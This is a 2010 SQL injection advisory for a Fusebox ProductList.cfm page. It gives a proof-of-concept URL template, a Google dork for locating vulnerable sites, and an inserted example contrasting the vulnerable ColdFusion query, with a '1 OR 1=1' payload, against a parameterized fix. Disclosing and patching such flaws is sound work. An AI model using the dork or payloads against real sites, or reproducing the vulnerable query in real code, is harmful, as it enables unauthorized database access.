-----------------------------------------------------------------------------------------
[AJS_ADVISORIES_01&2010]
fusebox (ProductList.cfm?CatDisplay) Remote SQL Injection Vulnerability
-----------------------------------------------------------------------------------------

Author       : Shamus
Date         : May 29th, 2010
Location     : Solo && Jogjakarta, Indonesia
Web          : http://antijasakom.org/forum
Critical Lvl : Moderate
Impact       : -
Where        : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : - (the advisory does not name the Fusebox-based application that ships ProductList.cfm)
version     : -
Vendor      : http://www.fusebox.org/
download    : http://www.fusebox.org/go/getting-started/downloading-fusebox
Description : Fusebox is the most popular framework for building ColdFusion and PHP
              web applications. "Fuseboxers" find that the framework releases
              them from much of the drudgery of writing applications and enables them
              to focus their efforts on creating great, customer-focused software.
--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~
The CatDisplay URL parameter of ProductList.cfm is passed into an SQL query
without validation or parameterization. Appending a single quote (%27) and
arbitrary SQL to the value lets a remote attacker alter the query that the
page executes.

PoC/Exploit:
~~~~~~~~~~

http://127.0.0.1/ProductList.cfm?CatDisplay=1%27[SQL query]
http://127.0.0.1/[path]/ProductList.cfm?CatDisplay=1%27[SQL query]

Dork:
~~~~~
Google : ProductList.cfm?CatDisplay

Solution:
~~~~~
-
N/A.
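The advisory gives no fix, so the following is an added example, written here for this edit; it is not code from the advisory, from ProductList.cfm, or from the Fusebox project. It shows the ColdFusion query pattern that produces the bug above beside its hardened form. The datasource name, the table and column names (Products, CategoryID, ProductID, ProductName, Price) and the 1 OR 1=1 payload are assumptions constructed for illustration.

```cfml
<!--- Added example, not from the advisory or the Fusebox project.
      application.dsn, the Products table and its columns are assumed. --->

<!--- VULNERABLE pattern: the raw URL parameter is interpolated into the SQL.
      ColdFusion doubles single quotes in variables used inside cfquery, so
      the advisory's probe (CatDisplay=1') reaches the database as
      "CategoryID = 1''" and typically surfaces as a database syntax error,
      which is what reveals the unparameterized query. In a numeric
      comparison no quote is needed at all: with the constructed payload
      CatDisplay=1 OR 1=1 the WHERE clause becomes "CategoryID = 1 OR 1=1"
      and every product row is returned. --->
<cfquery name="products" datasource="#application.dsn#">
    SELECT ProductID, ProductName, Price
    FROM   Products
    WHERE  CategoryID = #URL.CatDisplay#
</cfquery>

<!--- HARDENED pattern: validate the type before any query runs, then bind
      the value. cfparam throws for a non-integer value, and cfqueryparam
      sends the value to the driver as a bound integer parameter, so text
      supplied in the input is never parsed as SQL. --->
<cfparam name="URL.CatDisplay" type="integer" default="0">
<cfquery name="products" datasource="#application.dsn#">
    SELECT ProductID, ProductName, Price
    FROM   Products
    WHERE  CategoryID = <cfqueryparam value="#URL.CatDisplay#" cfsqltype="cf_sql_integer">
</cfquery>
```

In a Fusebox circuit the parameter usually arrives in the attributes scope rather than URL, but the fix is the same: a cfqueryparam with a cfsqltype matching the column on every value that comes from the request. The automatic quote-doubling is not a defense for numeric columns, which is why the first query stays exploitable even though the single-quote probe only produces an error.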

Timeline:
~~~~~~~

- 25 - 05 - 2010 bug found
- 29 - 05 - 2010 no vendor contacted
- 29 - 05 - 2010 advisory release
---------------------------------------------------------------------------

Shoutz:
~~~~~~~

oO0::::: Greetz and Thanks: :::::0Oo.
Tuhan YME
My Parents
SPYRO_KiD
K-159
lirva32
newbie_campuz

And Also My LuvLy :
..::.E.Z.R (The deepest Love I've ever had..).::..

in memorial :
1. Monique
2. Dewi S.
3. W. Devi Amelia
4. S. Anna

oO0:::A hearty handshake to: :::0Oo
~ Crack SKY Staff
~ Echo staff
~ antijasakom staff
~ jatimcrew staff
~ whitecyber staff
~ lumajangcrew staff
~ unix_dbuger, boys_rvn1609, jaqk, byz9991, bius, g4pt3k, anharku, wandi, 5yn_4ck, kiddies, bom2, untouch
~ arthemist, opt1lc, m_beben, gitulaw, luvrie, poniman_coy, ThePuzci, x-ace, newbie_z, petunia, jomblo.k, hourexs_paloer, cupucyber, kucinghitam, black_samuraixxx, ucrit_penyu, wendys182, cybermuttaqin
~ k3nz0, thomas_ipt2007, blackpaper, nakuragen, candra
~ whitehat, wenkhairu, Agoes_doubleb, diki, lumajangcrew a.k.a adwisatya a.k.a xyberbreaker, wahyu_antijasakom
~ Cruz3N, mywisdom, flyff666, gunslinger_, ketek, chaer.newbie, petimati, gonzhack, spykit, xtr0nic, N4ck0, assadotcom, Qrembiezs, d4y4x
~ All people in SMAN 3
~ All members of spyrozone
~ All members of echo
~ All members of newhack
~ All members of jatimcrew
~ All members of Anti-Jasakom
~ All members of whitecyber
~ All members of Devilzc0de
#e-c-h-o, #K-elektronik, #newhack, #Solohackerlink, #YF, #defacer, #manadocoding, #jatimcrew, #antijasakom, #whitecyber, #devilzc0de
---------------------------------------------------------------------------

Contact:
~~~~~~~~~

Shamus   : Shamus@antijasakom.org
Homepage : http://antijasakom.org/forum/viewtopic.php?f=38&t=600

-------------------------------- [ EOF ] ----------------------------------